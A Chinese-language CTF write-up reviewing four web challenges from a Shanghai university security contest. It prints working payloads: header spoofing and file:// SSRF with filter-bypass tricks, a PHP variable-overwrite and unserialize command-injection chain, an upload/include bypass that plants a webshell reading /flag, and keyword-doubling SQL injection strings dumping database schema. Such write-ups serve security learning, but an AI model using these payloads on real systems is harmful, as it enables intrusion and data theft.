第四届上海大学生网络安全大赛线上Web复盘

最近复习网工有点小累，，有点小炸

日常复盘学习不能落~~

加油

web1

源代码发现hint访问robots.txt有source.php，flag.php

访问source.php返回

1	you need to login as admin!<!-- post param 'admin' -->

POST:admin=1返回

1	you need to login as admin!<!-- post param 'admin' -->only 127.0.0.1 can get the flag!!

尝试各种IP头

X-Forwarded-For: 127.0.0.1
Contact: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
Referer: 127.0.0.1
From: 127.0.0.1
X-Wap-Profile: 127.0.0.1
True-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1

发现X-Client-IP: 127.0.0.1返回

1	you need to login as admin!<!-- post param 'admin' -->you need post url: http://www.ichunqiu.com

POST：admin=1&url=http://www.ichunqiu.com返回

1	you need to login as admin!<!-- post param 'admin' -->http://www.ichunqiu.com<img src="download/409352793;img1.jpg"/>

可通过uri：download/409352793;img1.jpg访问

发现可通过file协议读取，构造payload

1	admin=1&url=file://www.ichunqiu.com/../../../var/www/html/flag.php

ssrf关键词

share
wap
url
link
src
source
target
u
3g
display
sourceURl
imageURL
domain

存在过滤的时候可以试试以下姿势:

1、@
`http://abc@127.0.0.1`

2、添加端口号
`http://127.0.0.1:8080`

3、短地址
`http://dwz.cn/11SMa`

4、可以指向任意ip的域名：xip.io
`10.0.0.1.xip.io  =  10.0.0.1`
`www.10.0.0.1.xip.io  =  10.0.0.1`
`mysite.10.0.0.1.xip.io  =  10.0.0.1`
`foo.bar.10.0.0.1.xip.io  =  10.0.0.1`

5、ip地址转换成进制来访问
`115.239.210.26 ＝ 16373751032`

web2

主页访问.index.php.swp发现源码，

1	vi -r index.php //恢复index.php

<?php
error_reporting(0);
class come{    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }           
    function echo($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
}

$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
foreach($_GET as $key => $value) {
        if($i===1)
        {
            $i++;
            $$key = $value;
        }
        else{break;}
}
if($first==="doller")
{
    @parse_str($_GET['a']);
    if($var==="give")
    {
        if($bbb==="me")
        {
            if($ccc==="flag")
            {
                echo "<br>welcome!<br>";
                $come=@$_POST['come'];
                unserialize($come); 
            }
        }
        else
        {echo "<br>think about it<br>";}
    }
    else
    {
        echo "NO";
    }

}
else
{
    echo "Can you hack me?<br>";
}
?>

可以看到这是一个常规绕过加反序列的知识点

通过变量覆盖构造payload

1	?first=doller&a=var=give%26bbb=me%26ccc=flag

然后通过POST传入反序列化值，

<?php
error_reporting(0);
class come{
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = "echo";
        $this->args = array("host"=>"`cat\$IFS/fla\g`");
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }
    function echo1($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo1"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }
}
}

$he=new come();
echo urlencode(serialize($he));

payload

1	O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A15%3A%22%60cat%24IFS%2Ffla%5Cg%60%22%3B%7D%7D

web3

主页源码

<?php
  //error_reporting(0);
  //$dir=md5("icq" . $_SERVER['REMOTE_ADDR']);
  $dir=md5("icq");
  $sandbox = '/var/sandbox/' . $dir;
  @mkdir($sandbox);
  @chdir($sandbox);

  if($_FILES['file']['name']){
      $filename = !empty($_POST['file']) ? $_POST['file'] : $_FILES['file']['name'];		//上传文件
      if (!is_array($filename)) {
          $filename = explode('.', $filename);
      }
      $ext = end($filename);  //所取POST参数最后一个值
      if($ext==$filename[count($filename) - 1]){
          die("emmmm...");
      }
      $new_name = (string)rand(100,999).".".$ext; 
  //php/.绕过unlink
      move_uploaded_file($_FILES['file']['tmp_name'],$new_name);
      $_ = $_POST['hehe'];
      if(@substr(file($_)[0],0,6)==='@<?php' && strpos($_,$new_name)===false){
          include($_);
      }
      unlink($new_name);
  }
  else{
      highlight_file(__FILE__);
  }

php > $a=array();
php > $a[1]=123;
php > $a[0]=456;
php > echo end($a);
456

通过php/.绕过unlink函数，进行文件包含，保存至后台ext值仍为php，通过hehe参数（文件名）进行文件包含读取文件内容，可以上传这样一段webshell

1
2
3

@<?php
@eval(system("cat /flag"));
?>

前六个字符要求强制为 @<?php

然后再通过hehe爆破文件名查看flag

上传页面html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
<form action="http://038fde476c644c649c05c7100b41a532c772bf65d02e4fcc.game.ichunqiu.com/index.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="file" value="123456" />
    <input type="file" name="file" />
    <input type="submit" />
</form>

</body>
</html>

web4

首页sql注入，过滤了一些字符，from和select被替换为空字符，通过加空置换payload

1	id=-1' or (selselectect 1)#

payload

1	-1' unifromon selselectect (seselectlect database()),2#

1	-1' unifromon selselectect (seselectlect group_concat(table_name) frfromom information_schemafrom.tables where table_schema=database()),2#

1	-1' unifromon selselectect (seselectlect group_concat(column_name) frfromom information_schemafrom.columns where table_schema='web' and table_name='user'),2#